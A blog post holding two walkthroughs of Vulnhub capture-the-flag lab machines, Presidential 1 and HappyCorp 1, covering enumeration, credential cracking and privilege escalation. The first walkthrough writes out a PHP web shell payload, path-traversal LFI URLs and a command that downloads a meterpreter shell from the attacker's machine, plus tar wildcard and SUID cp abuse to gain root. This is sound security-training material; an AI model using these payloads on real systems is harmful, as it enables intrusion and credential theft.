Monday, July 20, 2020

Presidential: 1: Vulnhub CTF Walkthrough

Vulnhub: https://www.vulnhub.com/entry/presidential-1,500/ 
** Just a heads up, I was able to import into VMware Workstation without an issue. **
1.  First, doing a nmap scan for the CTF box’s IP Address.  Once discovered, doing a nmap scan for available service ports.

2. We have two available ports, 2082 and port 80.  Port 2082 was a ssh service and port 80 was an apache service running.
3. We do a dirb scan for port 80 to do directory enumeration.  
4. We also need to observe and enumerate the web pages. I did this using Burp.  I did not find much honestly for a while.  I took note of the domain votenow.local and added to my hosts file.  However, I was presented with the same information.  
5. This is where I asked for clue from the author of the CTF.  He mentioned there may be a hidden sub-domain and a backup file that could help get my a foothold to the box.  I never thought of virtual hosts for the box.  I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain.  Time to add it to the host file. 

6. This is where I scanned the hidden subdomain for all kinds of possible backup files.  Nothing. Well, interesting anyway. 
7.  What am I missing?  There must be a backup file somewhere.  I bet it is something simple too. Arrghhh.
8.  Ok, clue number 2.  Author suggested maybe try the main domain.   Of course, I missed that, and it has CREDS!!
User: votebox
Password: casoj3FFASPsbyoRP
9. I was able to get in.  Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table.  I see there is a hash for the admin’s user account.  That is all I see but hopefully I can use it somehow. 
* Used the hash from the users table in the web app.  
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password.  I was not able to use it to login or get different access to the phpMyAdmin app. Then, again I checked the phpMyAdmin version and checked for vulns again:
* https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
* https://cupuzone.wordpress.com/2018/07/23/a-little-study-about-latest-phpmyadmin-4-8-0-4-8-1-lfi-vulnerability/
* https://www.exploit-db.com/exploits/44924
* https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
* https://misduong.blogspot.com/2018/06/phpmyadmin-48x-lfi-to-rce-authorization.html
* https://cxsecurity.com/issue/WLB-2018070139
13.  I can exploit the LFI vuln using the database.  I was able to view the PHP config with phpinfo().  It took a minute to find the exact directory location for my session, but I eventually found it. 


14.  Now, let’s see if we can get a web shell in:   select "<?php passthru($_GET ['cmd']);exit;?>"
15.  http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=id
16. It worked.  We now know that the process is running as apache instead of root.  
17.  We should be able to get a better web shell in there.  We just need to host a page and get our small web shell to request the better one.


18.  With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=wget%20http://192.168.126.1/agoonie.php%20-O%20shell.php
19. I looked around for processes running as root.  Also, I looked for anything in the home directories.  There was only the admin dir.  It had two weird text files, user.txt and notes.txt.  Also, noted the version of the OS:  Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.  
[admin@votenow ~]$ cat notes.txt
cat notes.txt
Reminders:
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
cat user.txt
663ba6a402a57536772c6118e8181570
20.  I was stuck here.  Uploaded the LinEnum.sh file.  Looked for sticky bit files, more weird processes, etc.  Found nothing.  Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help. 
21.  After reading about this, now I got the clues from the text files in the admin folder.  Additional reading:  
* https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
* https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/
* https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
22. So identified the tarS executable that could copy the shadow file and allow us to read it.  I tried to crack it but no dice.  I even thought I could possibly rewrite it and add my own hash to it. Nope. 
23. I remembered about the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF but it worth checking out.  I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
24.  I see the ssh_id file and we have the ssh port.  Hopefully, it is not password protected.  We are in.  

25.  I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.  

Friday, June 7, 2019

HappyCorp 1: Vulnhub CTF Walkthrough

https://www.vulnhub.com/entry/happycorp-1,296/

1.  nmap scan for the ip address. Once discovered, do a full scan for the available ports.








2. We have several ports open on the server. Looks like we have HTTP, SSH, NFS being presented. Well checking the port services with amap, I decided to look at port 80 to see what kind
of web app was presented.

3. Possible users for the web app. This could be useful if I have to brute-force for authentication.

4. Time for some directory enumeration.
5.  Looks like there is a admin page and a /lib/ dir I should look at.

6.  I captured the authentication POST process of the web app using burp suite so I could later use it for sqlmap (sqlmap -r "file".  However, it did not get me very far.  Then, I used cewl to possible get a dictionary file to bruteforce the login page.  Nope. Nothing.  I used some info I got from the NFS share but more on that later.














7. Now, let's look at what is available on the nfs share. It's worth trying to see if there is an available NFS share if you see port 2049 open and port 111.


8. Ok. Now this was interesting. I connected to the share. I saw that it had a .ssh file. I was hoping to possible get keys from it but I did not have permission. I had to do some research and you could possible trick the server by using version 3 of NFS which had less security. You could do this creating an identical user with the same ID. However, I already had that ID in use on my box. Well, that is what my Kali Linux VM is for. I just mounted it there and added the user/ID.






9. Now, I am able to access the SSH keys. I copied them on both my main box and the Kali linux VM.



10. I also decoded the flag on https://www.asciitohex.com/.




11. Ok. Now it is time to try to connect using the keys. Of course, password protected. Well, we have a bruteforce for that. I usually just use PD (phrasen|drescher).

12. Looks like the password is sheep.
13. Anyway, we are able to connect to ssh but we are put into a restricted shell. Well, we already know we can try to get out of that.
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
However, the usual bash --noprofile does not work. Luckily, using the /bin/sh option does work.






14. Looked around to see the usual stuff. The kernel was at a pretty good level. I went to check for sticky bits and saw /bin/cp.







15. This is when I switched direction and started to look at the web files. I found the hard-coded credentials from the source code of the main page.





16. This looks like I could use LFI to read files on the server from the browser if I were able to login and browse to cms.php

17. Ok. The credentials work for heather. I am able to login.





18. Ahh. I am able to read /etc/passwd by browsing to:

19.  However, I am already connected to the box and I am able to read files from it.  How would you be able to read the credentials from admin.php if you were not able to exploit NFS/SSH?? Well, still working on that.  I may have to ask the Vulnhub machine author.
20. As the Rock would say, FOCUS! I see the sticky bit on 'cp' so it can be executed as if a user was root. I looked up possible techniques on:
21. I just have to create a salted hash to a passwd file and copy it to the machines /etc/passwd. I used the same kali box for this trick.






22. The file is created. I just have to transfer it to the machine. I just used wget to copy it over. Then, I just did a quick double check to make sure the changes were there.








23. Go time. Use the cp command and boom. I AM GROOT, ROOT!






24. Got the flag and used the ascii site again to find out it was "hackergod".